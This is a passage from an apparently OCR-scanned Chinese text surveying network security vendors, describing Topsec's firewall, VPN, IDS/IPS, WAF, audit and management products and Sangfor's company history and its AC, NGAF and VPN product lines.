或 泄露 ,有 助 于 更 深入 ,更 全 面 地 实施 数据 保护 ,从 而 确保 企业 机 密 数据 的 高 度 安 全 。 

5) 网 络 存储 与 管理 系统 

天 融 信 网 络 存储 与 管理 系统 系列 立足 技术 为 先导 ,为 用 户 提供 高 性 价 比 专业 化 的 企 
业 级 .运营 级 存储 产品 和 解决 方案 ,广泛 应 用 于 金融 电信、 监控、 制造 .电力 .教育 .政府 
等 行业 。 天 融 信 网 络 存储 与 管理 系统 提供 SAN/NAS 一 体 化 存储 服务 .多 业务 平台 数据 
集中 存储 与 管理 .用 户 组 文件 共享 服务 等 解决 方案 。 兼容 Windows 2000/XP/2003/ 
2008/Vista、Linux、Solaris、.HP-UX、AIX、MacOS 等 各 种 操作 系统 ,具有 高 性 能 、 高 品质 、 
高 可 扩充 性 、 高 集成 度 和 高 性 价 比 的 特点 。 

6) 敏感 信息 集中 管控 系统 

敏感 信息 集中 管控 系统 是 以 集中 安全 存储 为 基础 ,采用 加 密 保存 、 授 权 使 用 、 精 确 控 
制 和 全 程 审计 的 防护 ,对 数据 进行 的 加 密集 中 存储 、 文 件 授权 使 用 、 强 制 身份 认证 ,安全 
保密 外 带 (包括 打印 水 印 、 加 密 外 发 ) .全程 审 计 的 产品 。 

7) 数据 库 加 密 与 加 固 系统 

TDSM-DBS 是 由 天 融 信 公司 具有 自主 知识 产权 的 数据 库 安 全 防护 产品 。 系 统 从 计 
算 机 数据 安全 着 手 ,作为 数据 安全 保护 中 的 最 后 一 道 防 线 , 构 建 了 一 个 完整 的 高 强度 的 
数据 库 安全 防护 体系 。TDSM-DSM 满足 等 级 保护 、 分 级 保护 .军队 防护 标准 以 及 互联 
网 、 医 疗 等 行业 中 对 数据 进行 防 泄露 的 安全 政策 要 求 。 其 基于 数据 库 字段 级 透明 加 解密 
技术 ,采用 授权 访问 控制 而 设计 的 面向 服务 的 数据 库 安 全 管理 体系 。 获 盖 数 据 库 安全 加 
固 .数据 泄露 防护 ,用户 授权 访问 、 敏 感 数据 保护 .对 应 用 透明 的 计算 机 数据 库 层面 安全 
防护 。 

8) 数据 库 防 火 墙 系统 

天 融 信 数据 库 防 火 墙 系统 CTDSM-DBFW) 是 一 款 专 业 的 .主动 .实时 保护 数据 库 安 
全 的 解决 方案 。TDSM-DBFW 具有 虚拟 补丁 (VPatch)、SQL 防火 墙 . 访 问 控制 三 大 引 
擎 ,可 提供 黑白 名 单 和 例外 策略 、 潜 在 风险 评估 和 防护 .用 户 访问 权限 控制 ,以 及 针对 数 
据 库 漏洞 提供 的 虚拟 补丁 ,并 且 具 有 实时 监控 数据 库 活动 和 灵活 的 告警 功能 。 


Cs 网 络 安全 解决 方案 供应 商 及 产品 
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3. 边界 安全 

1) NGFW 下 一 代 防 火 墙 (猎豹 六 系列 ) 

天 融 信和 凭借 20 年 以 来 积累 的 安全 产品 研发 与 部 署 经 验 ,经 过 “猎豹 ”防火墙 近 十 年 
来 的 市 场 历 练 和 几 代 更 迭 后 ,针对 当前 的 应 用 模式 和 安全 威胁 ,推出 天 融 信 NGFW(r) 下 
一 代 防 火 墙 一 一 全 新 第 六 代 猫 鹏 。 第 六 代 猫 鹏 具备 如 下 特点 , 即 2 一 7 层 高 性 能 安全 处 
理 ;高 精度 应 用 识别 ;APT 未 知 威胁 防御 ;可 视 化 智能 安全 管理 等 。 

2) IPSEC VPN 系列 产品 .VONE 系列 产品 

网 络 卫 士 VPN 系统 包括 IPSEC VPN 、VONE(IPSEC/SSL VPN 多 合 一 网 关 ) 两 大 
系列 ,向 用 户 提供 成 熟 、 完 善 的 高 性 能 VPN 接 入 方案 ;拥有 包括 政府 ,金融 ,能 源 、 电 信 、 
交通 ,军队 .教育 和 企业 等 行业 在 内 的 两 万 余 名 用 户 。 国 内 最 大 VPN 网 络 的 运营 ,多 个 
全 球 性 VPN 项 目的 实施 ,验证 着 天 融 信 VPN 产品 凭借 卓越 的 品质 与 技术 进入 了 国际 领 
先行 列 。 

3) 网 曾 TopRules 

天 融 信和 网 络 卫 士 安全 隔离 与 信息 交换 系统 TopRules 是 北京 天 融 信 公 司 基 于 公司 具 
有 自主 知识 产权 的 安全 操作 系统 (Topsec Operating System,TOS) 和 多 年 网 络 安全 产品 
研发 经 验 研发 而 成 的 ,该 产品 基于 完整 的 安全 体系 结构 设计 理念 ,率先 完善 了 安全 隔离 
的 概念 。 该 产品 采用 2 十 1 系统 架构 ,通过 对 信息 进行 落地 、 还 原 、 扫 描 、 过 滤 、 防 病毒 、 入 
侵 检 测 、 审 计 等 一 系列 安全 处 理 机 制 ,有 效 防止 黑客 攻击 、 恶 意 代 码 和 病毒 渗入 ,同时 防 
止 内 部 机 密 信息 的 泄露 ,实现 网 间 安 全 隔离 和 信息 交换 。 

4) 入侵 检测 (IDS)Topsentry 

天 融 信 公司 自主 研发 的 网 络 卫士 入 侵 检 测 系统 (TopSentry 产品 ) 采 用 多 核 硬件 平 
台 , 内 置 SSD 固态 硬盘 ,通过 旁 路 部 署 方式 ,能 够 实时 检测 包括 溢出 攻击 、RPC 攻击 、 
WebCGI 攻 击 、 拒 绝 服务 攻击 、 木 马 、 蠕 虫 、 系 统 漏洞 等 超过 3500 种 网 络 攻击 行为 。 
TopSentry 产品 还 具有 应 用 协议 智能 识别 .P2P 流量 控制 .网 络 病毒 检测 、 恶 意 网 站 监测 
和 内 网 监控 等 功能 ,为 用 户 提 供 了 完整 的 立体 式 网 络 安全 检测 监控 。 

5) 入 侵 防 御 TopIDP 

天 融 信 公司 自主 研发 的 网 络 卫士 人 侵 防 御 系 统 (TopIDP 产品 ) 采 用 在 线 部 署 方式 ， 
能 够 实时 检测 和 阻 断 包 括 溢出 攻击 、RPC 攻击 、WebCGI 攻击 .拒绝 服务 攻击 、 木 马 、 蠕 
虫 、 系 统 漏洞 等 超过 3500 种 网 络 攻击 行为 ,可 以 有 效 地 保护 用 户 网 络 IT 服务 资源 。 
TopIDP 产品 还 具有 应 用 协议 智能 识别 、.P2P 流量 控制 .网 络 病毒 防御 、 上 网 行为 管理 、 恶 
意 网 站 过 滤 和 内 网 监控 等 功能 ,为 用 户 提供 了 完整 的 立体 式 网 络 安全 防护 。 

6) 抗拒 绝 服务 

天 融 信 公 司 自主 研发 的 天 融 信和 异常 流量 管理 与 抗拒 绝 服 务 系统 (Topsec Anti-DDOS 
System,TopADS 产品 ) 是 专业 的 抗拒 绝 服务 攻击 产品 , 它 能 够 从 纷 杂 的 网 络 背景 流量 中 
精准 地 识别 出 各 种 已 知 和 未 知 的 拒绝 服务 攻击 流量 ,并 能 够 实时 过 滤 和 清洗 ,确保 网 络 
正常 访问 流量 通畅 ,是 保障 服务 器 数据 可 用 性 的 安全 产品 。 
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7) 病毒 过 滤 网 关 TopFilter 

天 融 信 公司 推出 了 全 新 的 TopFilter 病毒 过 滤 网 关 , 该 系列 产品 集成 “应 用 性 能 高 效 
化 ”“ 病 毒 引擎 专业 化 ”“ 网 络 部 署 智 能 化 ”“ 全 方位 可 视 化 ”等 特性 ,从 而 实现 对 网 络 全 
方位 、 多 层次 的 安全 防护 。 

8) 统一 威胁 管理 (UTM)TopGate 

网 络 卫 士 安全 网 关 TopGate UTM 是 天 融 信 公司 基于 新 一 代 TOS 平台 自主 研发 的 
一 款 多 功能 综合 应 用 网 关 产 品 , 该 产品 采用 的 是 高 性 能 的 全 并 行 多 核 处 理 器 。《 多 核 多 
平台 并 行 安 全 操作 系统 ) 已 获得 中 华人 民 共 和 国 国 家 版 权 局 颁发 的 计算 机 软件 著作 权 登 
记 证 书 , 该 产品 集合 了 防火 墙 、 虚 拟 专 用 网 (VPN)、 入 侵 检 测 和 防御 (IPS) 、 网 关 防 病毒 、 
Web 内 容 过 滤 、 反 垃圾 邮件 ,流量 整形 .用 户 身份 认证 .审计 及 BT、IM 控制 等 多 种 应 用 于 
一 身 。TopGate 不 但 能 为 用 户 提供 全 方位 的 安全 威胁 防护 方案 ,还 为 用 户 提供 了 全 面 的 
策略 管理 .服务 质量 (QoS) 保 证 负载 均衡 ,高 可 用 性 CHA) 以 及 网 络 带 宽 管 理 等 功能 。 

9) 一 体 化 有 线 无 线 产品 

天 融 信 有 线 无 线 一 体 化 交换 机 系统 (TSW7000) 是 由 天 融 信 公司 开发 具有 自主 产权 
的 数据 通信 产品 。 天 融 信 是 国内 第 一 家 实现 有 线 无 线 一 体 化 产品 的 安全 厂商 。 该 系统 
采用 有 线 与 无 线 的 统一 管理 ,使 有 线 与 无 线 无 缝 衔 接 , 真 正 意义 上 实现 了 有 线 、 无 线 、 安 
全 三 者 的 完美 融合 。 


4. 业务 交付 


1) 负载 均衡 TopApp-LB 

网 络 卫士 TopApp 负载 均衡 系统 是 一 款 融 合 了 智能 带宽 控制 功能 的 链 路 及 服务 器 
负载 均衡 产品 。 通 过 对 网 络 出 口 链 路 和 服务 器 资源 的 优化 调度 ,TopApp 负载 均衡 系统 
让 大 规模 的 应 用 部 署 轻松 实现 ,同时 达 至 最 稳定 的 运行 效果 ,最 高 的 资源 利用 率 , 最 佳 的 
应 用 性 能 和 用 户 体验 。 大 量 的 企 事 业 单位 通过 TopApp 负载 均衡 系统 顺利 实现 了 应 用 
部 署 ,满足 了 信息 化 发 展 的 需求 ,并 极 大 地 提升 了 工作 效率 。 

2) 应 用 交付 TopApp-AD 

TopApp-AD 应 用 交付 系统 是 业界 功能 最 全 的 应 用 交付 设备 。 它 集 广域网 加 速 、 智 
能 流 控 \ 链 路 负载 均衡 和 服务 器 负载 均衡 等 功能 于 一 体 , 在 降低 用 户 IT 投资 成 本 的 同时 
帮助 其 轻松 实现 大 规模 的 应 用 部 署 ,全 方位 地 提升 应 用 系统 的 性 能 、 稳 定性 、 可 扩展 性 和 
用 户 体 验 。 大 量 企 事业 单位 通过 TopApp-AD 应 用 交付 系统 顺利 实现 了 应 用 系统 的 规模 
化 部 署 ,满足 了 信息 化 发 展 的 需求 , 极 大 地 提升 了 工作 效率 。 

3) 广域网 优化 TopApp-WO 

网 络 卫 士 TopApp-WO 广域网 优化 系统 是 一 款 融 合 了 智能 带宽 保障 功能 的 广域网 
加 速 产 品 。 它 可 以 有 效 克 服 网 络 延迟 、 丢 包 、 带 宽 限 制 等 因素 所 造成 的 数据 传输 效率 低 
下 ,显著 加 快 广域网 上 的 数据 传输 和 应 用 响应 速度 ,从 而 帮助 企 事业 单位 克服 网 络 瓶颈 ， 
提高 工作 效率 ,满足 其 随时 随地 访问 关键 应 用 及 数据 的 需求 。TopApp-WO 广域网 优化 
系统 经 过 了 大 量 不 同类 型 的 网 络 和 应 用 场景 的 验证 ,目前 已 被 广泛 应 用 于 政府 、 教 育 、 制 
造 、 能 源 、 地 产 \、 电 信 及 互联 网 等 行业 ,客户 包括 多 家 世界 500 强 企 业 。 
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4) 应 用 流量 管理 TopFlow 

TopFlow 应 用 流量 管理 系统 是 一 套 对 网 络 行为 应 用 流量 进行 分 析 、 监 管 和 管控 的 专 
业 系 统 。TopFlow 能 够 对 用 户 网 络 行为 流量 进行 精细 化 管理 ,为 管理 者 提供 图 形 化 的 应 
用 监视 .应 用 分 析 ,流量 管理 .应 用 统计 、 应 用 控制 流量 审计 、 应 用 报表 等 功能 ,是 最 新 一 
代 应 用 丰富 且 管 控 精 准 的 应 用 流量 分 析 监 管 系统 。 网 络 卫士 应 用 流量 管理 系统 从 百 兆 
到 万 兆 ,全 系列 产品 都 具有 很 高 的 系统 稳定 性 ,适用 于 强调 图 形 化 应 用 行为 监控 分 析 、 用 
户 行为 精细 化 控制 .应 用 识别 精准 度 大 于 99% 、 系 统 运行 要 求 稳定 的 网 络 环境 。 

5) 上 网 行为 管理 TopACM 

天 融 信 上 网 行为 管理 系统 是 天 融 信 公司 凭借 多 年 来 的 安全 产品 研发 经 验 ,为 满足 各 
行 各 业 进 行 网 络 行为 管理 和 内 容 审计 的 专业 产品 。 系 统 不 仅 具 有 防止 非法 信息 传播 ` 敏 
感 信息 泄露 ,实时 监控 .日 志 追 溯 , 网 络 资源 管理 ,还 具有 强大 的 用 户 管理 .报表 统计 分 析 
功能 。 


5. Web 安全 


1) 网 页 防 算 改 

天 融 信 和 网 页 防 算 改 系统 是 天 融 信 公 司 专 门 针 对 网 站 算 改 攻击 精心 研发 的 一 款 防护 
产品 ,系统 主要 功能 是 通过 文件 低层 驱动 技术 对 Web 站 点 目录 提供 全 方位 的 保护 ,防止 
黑客 ,病毒 等 对 目录 中 的 网 页 .电子 文档 、 图 片 数 据 库 等 任何 类 型 的 文件 进行 非法 算 改 
和 破坏 。 防 算 改 系统 保护 网 站 安全 运行 ,维护 政府 和 企业 形象 ,保障 互联 网 业务 的 正常 
运营 ,彻底 解决 了 网 站 被 非法 修改 的 问题 ,是 高 效 、 安 全 、 易 用 的 新 一 代 的 网 页 防 算 改 
系统 。 

2) Web 应 用 安全 网 关 TopWAF 

天 融 信 Web 应 用 安全 防护 系统 (TopWAF) 是 天 融 信 公司 根据 当前 的 互联 网 安全 形 
势 ,并 经 过 多 年 的 技术 积累 ,研制 出 品 的 专业 级 Web 威胁 防护 类 网 络 安全 产品 。 
TopWAF 是 天 融 信 Web 安全 团队 针对 “网 站 型 ”服务 器 量 身 定 制 的 产业 化 产品 ,汇聚 了 
天 融 信 公 司 长 期 对 网 站 系统 及 Web 安全 领域 的 研究 成 果 。 产 品 主要 从 网 站 系统 可 用 性 
和 信息 可 靠 性 的 角度 出 发 ,满足 用 户 对 于 Web 威胁 防护 、Web 性 能 优化 及 Web 数据 分 
析 等 功能 的 核心 需求 ,致力 于 为 各 类 网 站 系统 提供 全 方位 的 安全 防护 及 业务 优化 解决 
方案 。 


6. 合 规 审计 


1) 日 志 收 集 与 分 析 TopAudit-Log 

网 络 卫士 日 志 收 集 与 分 析 系 统 是 海量 日 志 管 理 系统 ,是 基于 Web 的 异 构 日 志 统 一 
收集 ,存储 查询、 统计 分 析 和 可 视 化 集中 管理 平台 ,系统 全 面 支持 各 种 网 络 设备 、 安 全 设 
备 、 主 机 和 应 用 系统 日 志 , 支 持 事 后 审计 和 定 责 取证 。 提 供 可 扩展 的 日 志 收 集 接口 ,不 断 
扩展 收集 分 析 能 力 ,实现 持续 审计 ,保障 客户 投资 。 

2) 网 络 审计 TopAudit-Net 

天 融 信 网 络 审计 系统 TopAudit-Net 是 高 性 能 专业 网 络 行为 审计 产品 ,支持 多 维 细 
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粒度 网 络 行为 和 流量 审计 分 析 , 基 于 多 核 平台 ,采用 云 审计 、 量 子 云 存储 等 多 项 独特 技术 
及 专利 , 旁 路 部 署 ,支持 透明 网 桥 、 多 点 多 级 和 集中 管理 ,引领 业界 技术 发 展 趋势 , 成 功 客 
户 遍 布 政府 能源. 电信 军工 等 行业 ,是 规范 网 络 行为 、 合 规 审计 的 最 佳 实践 。 

3) 运 维 审计 TA-SAG 

网 络 卫 士 运 维 审计 系统 应 用 了 目前 先进 的 技术 作为 支持 ,针对 企业 内 部 网 络 设备 和 
服务 器 进行 保护 ,对 此 类 资产 的 常用 访问 方式 进行 监控 和 审计 ,实现 对 用 户 行为 的 控制 、 
追踪 、 判 定 ,满足 企业 内 部 网 络 对 安全 性 的 要 求 。 

4) 数据 库 审 计 TopAudit-DB 

天 融 信 数 据 库 审计 系统 TopAudit-DB 是 由 天 融 信 公司 开发 具有 自主 知识 产权 的 数 
据 库 审计 系统 产品 。 是 国内 第 一 款 实现 即 查 即 显 、 实 时 报表 的 数据 库 审 计 系统 ,也 是 国 
内 唯一 一 款 真正 实现 三 层 关联 审计 分 析 的 产品 ,关联 审计 分 析 准 确 度 高 达 90% 以 上 。 该 
系统 采用 多 核 . 云 审计 、 量 子 云 存储 等 多 项 独特 技术 及 专利 , 旁 路 部 署 ,支持 多 点 多 级 和 
集中 管理 。 该 产品 拥有 大 量 成 功 客户 验证 ,是 保障 业务 安全 运营 ,实现 业务 审计 ,满足 等 
保 、 分 保 等 政策 法 规 、 标 准 、 规 定 的 合 规 要 求 的 最 佳 解决 方案 。 


7. 安全 管理 


1) 网 络 管理 系统 TopNM 

天 融 信 网 络 卫 士 网 络 管理 系统 是 一 款 综合 网 络 管理 系统 ,实现 了 对 网 络 设备 、 服 务 
器 、. 链 路 .安全 设备 .电源 .机房 环 境 、 终 端 PC 的 全 面 管 理 。 它 从 企业 级 用 户 角 度 出 发 ,有 
效 帮助 企业 级 用 户 从 根本 上 提高 了 网 络 的 稳定 性 、 可 靠 性 ,保证 了 核心 业务 的 高 效 、 稳 定 
和 安全 运转 ,使 企业 在 激烈 的 竞争 中 处 于 优势 地 位 。 

2) 安全 设备 与 策略 管理 系统 TopPolicy 

安全 设备 与 策略 管理 平台 TopPolicy 是 天 融 信 公司 网 络 卫 士 安全 管理 系统 的 重要 组 
成 部 分 ,TopPolicy 主要 针对 天 融 信 的 安全 设备 , 它 允 许 安 全 管理 员 简便 高 效 地 从 一 个 中 
央 控 制 台 管理 多 达 数 千 台 设备 。 其 关键 在 于 它 能 够 通过 简便 易 用 .直观 的 管理 功能 , 迅 
速 完成 设备 部 署 。 

3) 安全 信息 管理 TopAnalyzer 

天 融 信 网 络 卫士 安全 管理 系统 TopAnalyzer 是 面向 全 网 IT 资源 整合 的 安全 管理 平 
台 。 它 通过 对 全 网 安全 域 中 IT 资源 事件 的 采集 .处 理 和 分 析 , 构 建 可 度量 的 业务 信息 系 
统 风 险 模型 ,实现 集中 监控 .分 析 和 管理 的 信息 系统 ,展示 整体 信息 安全 态势 ,并 为 整个 
信息 系统 的 安全 运营 提供 决策 服务 和 运 维 流程 管理 。 该 系统 经 过 9 年 的 持续 发 展 ,获得 
20 多 项 专利 技术 ,是 政府 .电信 人、 金融 能源 及 企业 客户 构建 安全 管理 运营 中 心 的 最 佳 
选择 。 

4) 等 保管 理 平 台 

天 融 信 “等 保管 理 平 台 ? 是 天 融 信 根 据 多 年 信息 安全 咨询 经 验 结合 众多 客户 案例 而 
推出 的 ,具有 自主 知识 产权 的 等 级 保护 实施 辅助 系统 ,以 先进 的 体系 结构 、 完 善 的 功能 、 
高 效 灵 活 的 处 理 方式 实现 了 对 等 级 保护 整体 实施 过 程 的 指导 与 监控 ,可 更 好 地 保障 等 级 
保护 工作 实施 效果 ,提高 等 级 保护 工作 的 完成 质量 。 
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5) 漏洞 扫描 管理 系统 TopScanner 

天 融 信和 网 络 卫 士 脆弱 性 扫描 与 管理 系统 (TopScanner) 是 北京 天 融 信 公司 基于 多 年 
网 络 安全 产品 研发 经 验 推出 的 包括 应 用 检测 、 漏 洞 扫 描 、 弱 点 识别 ,风险 分 析 、 综 合 评 估 
的 脆弱 性 扫描 与 管理 评估 产品 。TopScanner 不 但 可 分 析 和 指出 有 关 网 络 的 安全 漏洞 及 
被 测 系统 的 薄弱 环节 ,给 出 详细 的 检测 报告 ,并 针对 检测 到 的 网 络 安全 隐患 给 出 相应 的 
修补 措施 和 安全 建议 。TopScanner 为 提高 内 部 网 络 安全 防护 性 能 和 抗 破坏 能 力 ,检测 评 
估 已 运行 网 络 的 安全 性 能 ,为 网 络 系统 管理 员 提 供 实时 安全 建议 提供 一 种 有 效 实用 的 脆 
弱 性 评估 工具 。 


45 琛 信服 科技 有 限 公 司 


深信 服 科技 有 限 公司 ,通过 提供 各 种 基于 应 用 层 的 网 络 安全 与 网 络 优化 产品 及 网 络 
基础 架构 产品 ,帮助 组 织 维护 网 络 稳定 ,促进 业务 发 展 。 作 为 全 球 网 络 产品 领域 发 展 最 
快 的 厂商 之 一 ,深信 服 每 年 都 保持 着 50% 以 上 的 增长 率 ,并 在 进入 的 所 有 领域 都 获得 了 
或 正在 获得 领先 。 


451 基本 情况 


深信 服 科技 有 限 公司 是 中 国 领先 的 新 网 络 产品 供应 商 , 于 2000 年 成 立 于 深圳 ,致力 
于 通过 创新 的 网 络 产品 帮助 商业 用 户 提升 业务 效率 ,增加 收益 ,防范 风险 并 降低 成 本 , 提 
升 用 户 的 带宽 价值 。 目 前 ,深信 服 科技 公司 规模 近 2000 人 ,在 全 球 设 有 49 个 分 支 机 构 ， 
人 员 分 布 于 中 国内 地 主要 城市 及 美国 .英国 、 新 加 坡 、 马 来 西亚、 泰国 .中 国 香港 等 国家 和 
地 区 。 截 止 到 2013 年 12 月 31 日 ,深信 服 科 技 的 终端 用 户 数量 已 超过 21000 家 ,包括 通 
用 电气 .壳牌 石油 .丰田 汽车 .中 国 移动 等 世界 知名 企业 ,以 及 中 国人 民 银 行 .国资 委 、 国 
土 资源 部 .外 交 部 等 重要 政府 机 构 。2005 一 2012 年 ,深信 服 科 技 连续 八 届 蝉联 德勤 “亚太 
地 区 高 科技 高 成 长 500 强 ”, 再 次 由 自己 打破 了 德勤 的 成 长 记录 ,并 被 (财富 ?杂志 连 续 两 
届 评 为 “中 国 卓 越 雇主 ”。 


452 发 展 历程 


2000 年 ,深信 服 科 技 有 限 公司 正 式 注册 成 立 。 

2002 年 ,正式 推出 IPSec VPN 产品 。 

2004 年 ,正式 进军 SSL VPN 市 场 ,推出 全 球 第 一 款 IPSec/SSL 二 合 一 VPN 网 关 。 

2005 年 ,CTI 呼叫 中 心 正 式 成 立 。 同 年 ,首次 入 选 德勤 “中 国 高 科技 高 成 长 50 强 ”。 
并 且 首 家 发 布 上 网 行为 管理 产品 ,开辟 了 全 新 的 细 分 市 场 

2006 年 ,连续 第 2 年 人 选 德勤 “中 国 高 科技 高 成 长 50 强 ”, 并 发 布 亚太 区 域 第 一 款 广 
域 网 优化 产品 。 

2007 年 10 月 ,连续 第 3 年 荣获 德勤 “中 国 高 科技 高 成 长 50 强 ”, 三 年 增长 率 为 
429. 84%。 
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2008 年 5 月 ,成立 香港 办 事 处 ,开始 组 建 海外 销售 、 服 务 体系 。 同 年 6 月 ,研发 体系 
导入 CMM 和 IDP 流程 ,客服 体系 导入 ISO 9000 质量 管理 认证 ,公司 进一步 改善 产品 开 
发 与 服务 质量 。 同 年 7 月 ,公司 建立 了 业内 规模 最 大 ,硬件 实力 最 强 、 专 业 化 水 平 最 高 的 
客户 服务 团队 。 同 年 10 月 ,连续 第 4 年 荣获 德勤 “中 国 高 科技 高 成 长 50 强 ”, 并 且 研 发 中 
心 搬迁 ,公司 引入 全 球 顶 级 硬件 测试 设备 一 一 思 博 伦 测试 仪 。 同 年 11 月 ,荣获 渣打 银行 
授予 的 2008 年 度 “ 最 具 成 长 性 新 锐 企业 ”中 型 企业 金奖 。 同 年 12 月 ,深信 服 主导 的 
IPSec/SSL VPN 国家 标准 成 功 通 过 国家 密码 局 办 公 室 验 收 。 

2009 年 1 月 ,国际 知名 机 构 Frost & Sullivan 调查 报告 显示 : 深信 服 SSL VPN 在 
2008 年 第 三 季度 ,市 场 占 有 率 以 35. 5% 高 居中 国 市 场 第 一 。 同 年 3 月 , 荣 座 “国家 级 高 
新 技术 企业 ”*”“ 深 圳 市 重点 软件 企业 ”称号 。 同 年 4 月 ,全 系列 产品 人 围 中 央 政 府 协议 供 
货 平台 ,成 为 人 围 产品 最 多 的 厂商 之 一 。 同 年 5 月 ,正式 推出 流量 控制 ,应 用 交付 新 产 
品 ,产品 线 进 一 步 优化 。 同 年 11 月 .上 网 优化 网 关 正 式 发 布 , 并 且 Frost & Sullivan 公司 
调查 报告 显示 ,深信 服 SSL VPN 在 2008 年 全 年 ,市 场 占有 率 以 31. 1% 高 居中 国 市 场 
第 一 。 

2010 年 1 月 ,发布 新 品牌 标识 SANGFOR ,体现 深信 服 同 其 客户 ,合作 伙伴 的 和 谐 共 
启 , 以 及 不 断 创新 、 立 足 全 球 的 增长 战略 。 同 年 4 月 ,Frost & Sullivan 调查 报告 显示 , 深 
信服 SSL VPN 在 2009 年 的 市 场 占有 率 提升 至 34% ,连续 两 年 保持 中 国 市 场 第 一 。 同 年 
7 月 ,深信 服 供应 链 全 体系 通过 ISO 9001:2008 质量 管理 体系 认证 。 

2013 年 2 月 ,深信 服 下 一 代 防 火 墙 荣获 OWASP 认证 。 同 年 3 月 ,深信 服 上 网 行为 
管理 产品 通过 EAL3 等 级 认证 。 


453 主要 产品 


1. 网 络 行为 管理 AC 


深信 服 上 网 行为 管理 AC 具备 专业 的 行为 管理 ,应 用 控制 .流量 管控 \ 信 息 管控 非法 
热点 管控 ,行为 分 析 、 无 线 网 络 管理 等 功能 ,真正 做 到 全 网 全 终端 统一 上 网 行为 管理 ;有 
效 防止 员工 进行 与 工作 无 关 的 网 络 行为 ;提高 带宽 资源 利用 率 ;规避 泄密 和 法 规 风险 、 保 
障 内 网 数据 安全 ;可 视 化 管理 以 及 全 面 管控 无 线 AP。 深 信服 上 网 行为 管理 主要 应 用 于 
互联 网 出 口上 网 行为 管理 ,万 兆 环 境 上 网 行为 管理 .有线 无 线 统一 上 网 行为 管理 几 大 应 
用 场景 ,已 服务 于 18000 多 家 各 行业 用 户 。 其 功能 模块 如 图 4. 10 所 示 。 

产品 优势 如 下 。 

1) 精细 准确 的 应 用 控制 

针对 网 络 应 用 的 管控 更 全 面 、 精 准 、 便 捷 。 它 拥有 全 国 最 大 的 应 用 识别 特征 库 , 识 别 
2100 条 网 络 应 用 .700 多 条 移动 应 用 ,每 2 周 更 新 一 次 。 针 对 应 用 的 细 分 功能 精准 控制 ， 
如 区 分 网 盘 的 上 传 和 下 载 等 动作 。 标 签 化 的 批量 管理 模式 , 极 大 提高 了 管理 效率 。 

2) 智能 精准 的 流量 管理 

独 有 3 大 流量 管理 技术 ,可 以 提高 30% 以 上 的 带宽 利用 率 。 其 动态 流 控 功 能 可 以 动 
态 调节 流 控 策 略 ,智能 分 配 空闲 时 带宽 资源 。 智 能 流 控 功 能 精准 控制 P2P 上 下 行 流量 ， 
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图 4.10 上 网 行为 管理 AC 功能 模块 


真正 * 管 住 ?P2P 流量 。 对 用 户 流量 “套餐 ”定制 ,分 配 指 定 流量 套餐 ,对 “套餐 ”超额 的 用 
户 进行 人 性 化 带宽 限制 。 

3) 完整 有 效 的 数据 记录 

信息 管控 功能 在 业内 技术 领先 , 它 可 以 识别 网 络 中 的 外 发 信息 ,支持 论坛 邮件 、IM.、 
网 盘 等 应 用 外 发 行为 控制 ,防止 企业 核心 信息 外 泄 ,甚至 包括 SSL 加 密 的 邮件 等 多 种 行 
为 ,为 网 络 敏感 事件 提供 日 志 湖 源 。 高 性 能 外 置 数据 中 心 可 以 存储 海量 日 志 。 

4) 全 网 全 终端 统一 管控 

有 效 管控 有 线 和 无 线 网 络 ,做 到 全 网 全 终端 统一 管控 。 具 备 丰 富 灵 活 的 认证 方式 ， 
全 面 保证 接 入 安全 可 控 , 支 持 如 用 户 名 密码 IP/ MAC 绑 定 等 多 种 传统 认证 方式 ,以 及 增 
值 营 销 认 证 (二 维 码 , 短 信 ,、 微 信 、APP. 支 付 宝 等 )。 基 于 用 户 、 应 用 位置 ,终端 类 型 的 权限 
控制 ,同时 内 置 无 线 控制 器 功能 ,直接 管理 深信 服 AP, 更 快 ,更 低 成 本 地 建设 无 线 网 络 。 


2. 下 一 代 防 火 墙 NGAF 


在 2011 年 ,深信 服 就 率先 推出 了 下 一 代 防 火 墙 NGAF。 产 品 推出 后 ,受到 广大 用 户 
的 一 致 好 评 ,年 销量 平均 增长 率 超 过 100% 。 

深信 服 下 一 代 防 火 墙 NGAF 提供 L2 一 L7 层 安全 可 视 的 全 面 防护 ,通过 双向 检测 网 
络 流量 ,有 效 识别 来 自 网 络 层 和 应 用 层 的 内 容 风 险 , 提 供 比 同时 部 署 传 统 防 火 墙 \IPS 和 
WAF 等 多 种 安全 设备 更 强 的 安全 防护 能 力 ,可 以 抵御 来 源 更 广泛 .操作 更 简便 、 危 害 更 
明显 的 应 用 层 攻击 。 此 外 ,深信 服 下 一 代 防 火 墙 还 提供 基于 业务 的 风险 报表 ,内 容 丰 富 
直观 ,用 户 可 实时 了 解 网 络 和 业务 系统 的 安全 状况 ,有 效 提升 管理 效率 、 降 低 运 维 成 本 。 

主要 的 产品 优势 如 下 。 

1) 完整 的 L2-L7 层 安 全 防御 体系 

可 同时 抵御 网 络 层 攻 击 和 应 用 层 攻击 .精确 识别 应 用 、 用 户 、 内 容 和 威胁 ,具备 强化 
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的 Web 安全 防护 能 力 ,抵御 各 类 Web 攻击 。 

2) APT 攻击 和 僵尸 网 络 检测 

结合 深度 内 容 检测 和 攻击 行为 分 析 技 术 , 可 更 有 效 地 检测 和 定位 APT 攻击 ;基于 终 
端 异常 行为 分 析 机 制 , 能 快速 发 现 僵尸 网 络 并 阻止 攻击 外 发 。 

3) 直观 呈现 业务 系统 安全 风险 

设备 可 实现 7X24 小 时 业务 流量 监测 ,实时 发 现 系 统 新 增 漏洞 ,并 能 直观 呈现 业务 
系统 漏洞 及 遭受 的 攻击 ,快速 定位 有 效 攻击 , 令 用 户 可 及 时 采取 应 急 措 施 。 

4) 云 安 全 技术 助力 未 知 威胁 响应 

先进 的 安全 沙 盒 技术 可 及 时 发 现 用 户 上 报 的 可 疑 流 量 中 的 未 知 威 胁 ,并 实时 共享 全 
球 未 知 威胁 信息 ,防止 新 型 威胁 集中 爆发 。 


3. IPSec VPN 


针对 不 同类 型 .规模 的 分 支 节点 推出 多 种 VPN 产品 种 类 : 3G/4G VPN、 Wi-Fi 
VPN MIG 一 体 化 网 关 ;3G/4G VPN 系列 帮助 客户 小 型 分 支 .微型 分 支 . 离 散 分 支 移动 
分 支 等 快速 构建 安全 、 高 效 的 业务 信息 网 络 ; Wi-Fi VPN 系列 不 仅 融合 3G/4G 模块 , 同 
时 实现 分 支 节点 无 线 Wi-Fi 完美 覆盖 ;MIG 一体 化 网 关 集 VPN ,安全 管控 、 路 由 交换 于 
一 体 , 一 台 设 备 满足 中 小 型 分 支 多 样 化 需求 。 

